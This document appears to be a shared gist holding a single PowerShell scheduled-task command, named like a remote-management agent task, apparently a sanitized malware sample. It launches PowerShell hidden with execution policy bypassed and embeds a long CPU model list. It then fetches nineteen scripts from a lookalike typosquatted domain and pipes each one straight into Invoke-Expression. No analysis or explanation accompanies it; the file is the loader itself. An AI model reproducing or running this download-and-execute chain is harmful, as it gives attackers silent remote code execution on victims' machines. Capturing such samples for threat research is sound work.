JohnHammond/LTSvc.task.ps1 Secret

## LTSvc.task.ps1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -NoProfile -command "& {$Models = {\";AMD,AMD,3015e;AMD,AMD,3020e;AMD,Athlon™,Gold 3150C;AMD,Athlon™,Gold 3150U;AMD,Athlon™,Silver 3050C;AMD,Athlon™,Silver 3050e;AMD,Athlon™,Silver 3050U;AMD,Athlon™,3000G;AMD,Athlon™,300GE;AMD,Athlon™,300U;AMD,Athlon™,320GE;AMD,Athlon™,Gold 3150G;AMD,EPYC™,7662;AMD,EPYC™,7702;AMD,EPYC™,7702P;AMD,EPYC™,7742;AMD,EPYC™,7643;AMD,EPYC™,7663;AMD,EPYC™,7713;AMD,EPYC™,7713P;AMD,EPYC™,7763;AMD,Ryzen™ 3,3250C;AMD,Ryzen™ 3,3250U;AMD,Ryzen™ 3,3200G with Radeon™ Vega 8 Graphics;AMD,Ryzen™ 3,3200GE;AMD,Ryzen™ 3,3200U;AMD,Ryzen™ 5 PRO,3400G;AMD,Ryzen™ 5 PRO,3600;AMD,Ryzen™ 5 PRO,4650G;AMD,Ryzen™ 5 PRO,4650GE;AMD,Ryzen™ 5 PRO,4650U;AMD,Ryzen™ 5 PRO,5650U;AMD,Ryzen™ 7,3700C;AMD,Ryzen™ 7,3700U;AMD,Ryzen™ 7,3750H;AMD,Ryzen™ 7,3780U Microsoft Surface® Edition;AMD,Ryzen™ 7,4800HS;AMD,Ryzen™ 7,4800U;AMD,Ryzen™ 7,5800H;AMD,Ryzen™ 7,5800HS;AMD,Ryzen™ 7,5800U;AMD,Ryzen™ 7,5800;AMD,Ryzen™ 7,5800X;AMD,Ryzen™ 7 PRO,3700U;AMD,Ryzen™ 7 PRO,2700;AMD,Ryzen™ 7 PRO,2700X;AMD,Ryzen™ 7 PRO,4750G;AMD,Ryzen™ Threadripper™ PRO,3955WX;AMD,Ryzen™ Threadripper™ PRO,3975WX;AMD,Ryzen™ Threadripper™ PRO,3995WX;Intel®,Atom®,x6200FE;Intel®,Atom®,x6211E;Intel®,Atom®,x6212RE;Intel®,Atom®,x6413E;Intel®,Atom®,x6414RE;Intel®,Atom®,x6425E;Intel®,Atom®,x6425RE;Intel®,Atom®,x6427FE;Intel®,Celeron®,G4900;Intel®,Celeron®,G4900T;Intel®,Celeron®,G4920;Intel®,Core™,i5-10210Y;Intel®,Core™,i5-10310Y;Intel®,Core™,i5-8200Y;Intel®,Core™,i7-9700KF;Intel®,Core™,i7-9700T;Intel®,Core™,i7-9700TE;Intel®,Core™,i7-9750H;Intel®,Core™,i7-9750HF;Intel®,Core™,i7-9850H;Intel®,Core™,i7-9850HE;Intel®,Core™,i7-9850HL;Intel®,Core™,i9-8950HK;Intel®,Core™,i9-9880H;Intel®,Core™,i9-9900;Intel®,Core™,i9-9900K;Intel®,Core™,i9-10900TE;Intel®,Core™,i9-10980HK;Intel®,Core™,i3-1000G1;Intel®,Core™,i7-1065G7;Intel®,Core™,i7-1068NG7;Intel®,Core™,i3-L13G4;Intel®,Core™,i5-L16G7;Intel®,Core™,i5-11400;Intel®,Core™,i5-11400F;Intel®,Core™,i5-11400T;Intel®,Core™,i5-11500;Intel®,Core™,i5-11500T;Intel®,Core™,i5-11600;Intel®,Core™,i5-11600K;Intel®,Core™,i5-11600KF;Intel®,Core™,i5-11600T;Intel®,Core™,i7-11700;Intel®,Core™,i7-11700F;Intel®,Core™,i7-11700K;Intel®,Core™,i7-11700KF;Intel®,Core™,i7-11700T;Intel®,Core™,i9-11900;Intel®,Core™,i9-11900F;Intel®,Core™,i9-11900K;Intel®,Core™,i9-11900KF;Intel®,Core™,i9-11900T;Intel®,Core™,i3-1110G4;Intel®,Core™,i3-1115G4;Intel®,Core™,i7-1185G7;Intel®,Core™,i7-1185G7E;Intel®,Core™,i7-1185GRE;Intel®,Pentium®,Gold 4425Y;Intel®,Pentium®,Gold 6500Y;Intel®,Pentium®,Gold G5400;Intel®,Pentium®,Gold G5400T;Intel®,Pentium®,Gold G5420;Intel®,Pentium®,Gold G5420T;Intel®,Pentium®,J6426;Intel®,Pentium®,N6415;Intel®,Pentium®,Silver N6000;Intel®,Pentium®,Silver N6005;Intel®,Pentium®,Gold 7505;Intel®,Xeon®,Gold 6240;Intel®,Xeon®,Gold 6240L;Intel®,Xeon®,Gold 6240R;Intel®,Xeon®,Gold 6240Y;Intel®,Xeon®,Gold 6242;Intel®,Xeon®,Platinum 8352S;Intel®,Xeon®,Platinum 8352V;Intel®,Xeon®,Platinum 8368;Intel®,Xeon®,Platinum 8368Q;Intel®,Xeon®,Platinum 8380;Intel®,Xeon®,Silver 4309Y;Intel®,Xeon®,Silver 4310;Intel®,Xeon®,Silver 4310T;Intel®,Xeon®,Silver 4314;Intel®,Xeon®,Silver 4316;Qualcomm®,Snapdragon™,Snapdragon 850;Qualcomm®,Snapdragon™,Snapdragon 7c;Qualcomm®,Snapdragon™,Snapdragon 8c;Qualcomm®,Snapdragon™,Snapdragon 8cx;Qualcomm®,Snapdragon™,Microsoft SQ2;\"};IF([Net.SecurityProtocolType]::Tls) {[Net.ServicePointManager]::SecurityProtocol=[Net.ServicePointManager]::SecurityProtocol -bor [Net.SecurityProtocolType]::Tls};IF([Net.SecurityProtocolType]::Tls11) {[Net.ServicePointManager]::SecurityProtocol=[Net.ServicePointManager]::SecurityProtocol -bor [Net.SecurityProtocolType]::Tls11};IF([Net.SecurityProtocolType]::Tls12) {[Net.ServicePointManager]::SecurityProtocol=[Net.ServicePointManager]::SecurityProtocol -bor [Net.SecurityProtocolType]::Tls12};(new-object Net.WebClient).DownloadString(\"https://typosquatted-random-nonsense-productweb-com.lookalike.net:8443/ArbitrarySubdirectory/Unprotect-AffiliatedCelebrate.ps1\") | Invoke-Expression | Out-Null;(new-object Net.WebClient).DownloadString(\"https://typosquatted-random-nonsense-productweb-com.lookalike.net:8443/ArbitrarySubdirectory/Initialize-ThoroughlyMaintains.ps1\") | Invoke-Expression | Out-Null;(new-object Net.WebClient).DownloadString(\"https://typosquatted-random-nonsense-productweb-com.lookalike.net:8443/ArbitrarySubdirectory/Search-JavascriptRegarding.ps1\") | Invoke-Expression | Out-Null;(new-object Net.WebClient).DownloadString(\"https://typosquatted-random-nonsense-productweb-com.lookalike.net:8443/ArbitrarySubdirectory/Trace-CommonwealthFiltering.ps1\") | Invoke-Expression | Out-Null;(new-object Net.WebClient).DownloadString(\"https://typosquatted-random-nonsense-productweb-com.lookalike.net:8443/ArbitrarySubdirectory/Suspend-AdventuresApproaches.ps1\") | Invoke-Expression | Out-Null;(new-object Net.WebClient).DownloadString(\"https://typosquatted-random-nonsense-productweb-com.lookalike.net:8443/ArbitrarySubdirectory/Format-PossibilityRecovered.ps1\") | Invoke-Expression | Out-Null;(new-object Net.WebClient).DownloadString(\"https://typosquatted-random-nonsense-productweb-com.lookalike.net:8443/ArbitrarySubdirectory/Select-ActivitiesLafayette.ps1\") | Invoke-Expression | Out-Null;(new-object Net.WebClient).DownloadString(\"https://typosquatted-random-nonsense-productweb-com.lookalike.net:8443/ArbitrarySubdirectory/Read-PaintballOpportunities.ps1\") | Invoke-Expression | Out-Null;(new-object Net.WebClient).DownloadString(\"https://typosquatted-random-nonsense-productweb-com.lookalike.net:8443/ArbitrarySubdirectory/Complete-SocietiesCorrectly.ps1\") | Invoke-Expression | Out-Null;(new-object Net.WebClient).DownloadString(\"https://typosquatted-random-nonsense-productweb-com.lookalike.net:8443/ArbitrarySubdirectory/Lock-ConceptualGeography.ps1\") | Invoke-Expression | Out-Null;(new-object Net.WebClient).DownloadString(\"https://typosquatted-random-nonsense-productweb-com.lookalike.net:8443/ArbitrarySubdirectory/Search-CharacteristicsRecipients.ps1\") | Invoke-Expression | Out-Null;(new-object Net.WebClient).DownloadString(\"https://typosquatted-random-nonsense-productweb-com.lookalike.net:8443/ArbitrarySubdirectory/Search-VegetarianContinuous.ps1\") | Invoke-Expression | Out-Null;(new-object Net.WebClient).DownloadString(\"https://typosquatted-random-nonsense-productweb-com.lookalike.net:8443/ArbitrarySubdirectory/Undo-CorrectlyUnderstand.ps1\") | Invoke-Expression | Out-Null;(new-object Net.WebClient).DownloadString(\"https://typosquatted-random-nonsense-productweb-com.lookalike.net:8443/ArbitrarySubdirectory/Save-DisturbedAccording.ps1\") | Invoke-Expression | Out-Null;(new-object Net.WebClient).DownloadString(\"https://typosquatted-random-nonsense-productweb-com.lookalike.net:8443/ArbitrarySubdirectory/Show-PlaystationReputation.ps1\") | Invoke-Expression | Out-Null;(new-object Net.WebClient).DownloadString(\"https://typosquatted-random-nonsense-productweb-com.lookalike.net:8443/ArbitrarySubdirectory/Lock-TroubleshootingAssumptions.ps1\") | Invoke-Expression | Out-Null;(new-object Net.WebClient).DownloadString(\"https://typosquatted-random-nonsense-productweb-com.lookalike.net:8443/ArbitrarySubdirectory/Unprotect-OrganizerCorporation.ps1\") | Invoke-Expression | Out-Null;(new-object Net.WebClient).DownloadString(\"https://typosquatted-random-nonsense-productweb-com.lookalike.net:8443/ArbitrarySubdirectory/Split-AchievingProgrammes.ps1\") | Invoke-Expression | Out-Null;(new-object Net.WebClient).DownloadString(\"https://typosquatted-random-nonsense-productweb-com.lookalike.net:8443/ArbitrarySubdirectory/Disable-PercentageEntrepreneurs.ps1\") | Invoke-Expression | Out-Null;}"